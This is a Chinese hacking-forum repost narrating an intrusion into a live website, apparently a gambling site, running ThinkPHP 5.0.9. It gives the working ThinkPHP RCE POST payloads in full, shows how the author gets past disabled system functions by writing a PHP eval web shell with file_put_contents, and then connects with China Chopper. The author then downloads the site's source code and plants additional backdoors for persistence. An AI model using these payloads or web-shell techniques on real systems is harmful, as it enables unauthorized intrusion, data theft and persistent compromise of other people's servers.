跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

精选回复

发布于

0x01 确定目标

主站:

1049983-20220106104330681-1405261208.png

旁站:

1049983-20220106104331327-1747311994.png

0x02 漏洞利用

通过信息收集发现是个tp v5.0.9,此版本存在tp-rce漏洞。

1049983-20220106104331825-1027593284.png

直接通过payload进行测试,

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

查找payload,直接打:

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

1049983-20220106104332260-1610753114.png

发现是php 5.4.45版本的,

直接尝试getshell:

1049983-20220106104332691-319550220.png

发现system被禁用,尝试其他系统命令的也一样。

1049983-20220106104333144-1922570488.png

查看phpinfo中desable_functions禁用了那些函数。

1049983-20220106104333540-1301638445.png

想办法怎么绕过进行写马(此处卡了我半天)
最后通过一位渗透小伙伴,想出下面的可以利用file_put_contents直接写shell,想了半天,忘了用其他函数进行直接写马就可以了,并不需要非得利用system命令进行写马,还是底层知识薄弱啊。再次感谢小伙伴!

1049983-20220106104333995-1796623647.png

0x03 getshell

构造payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','<?php eval($_POST[a])?>')

1049983-20220106104334533-47908496.png

写入成功,利用菜刀连接。

1049983-20220106104334965-571720133.png

成功连接。
查看权限:

1049983-20220106104335330-28763533.png

发现启动了远程安全模式。
想要绕过,发现很多函数被禁用,占未成功。
下载源码:

1049983-20220106104335675-327281683.png

多部署一些后门,防止被删。

0x04 总结

1.打开BC网站,通过底部版本信息,发现该站点框架是tp v5.0.9,存在RCE漏洞

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

2.发现是php 5.4.45版本的,直接尝试执行命令,发现system函数以及执行系统命令的函数也被禁用。

Post:_method=__construct&filter[]=assert&method=get&get[]=whomai

3.虽然禁用系统命令函数,可利用file_put_contents直接写shell绕过

4.获得getshell

构造payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','<?php eval($_POST[a])?>')

5.写入成功,利用菜刀连接




来源: https://xz.aliyun.com/t/9232




创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。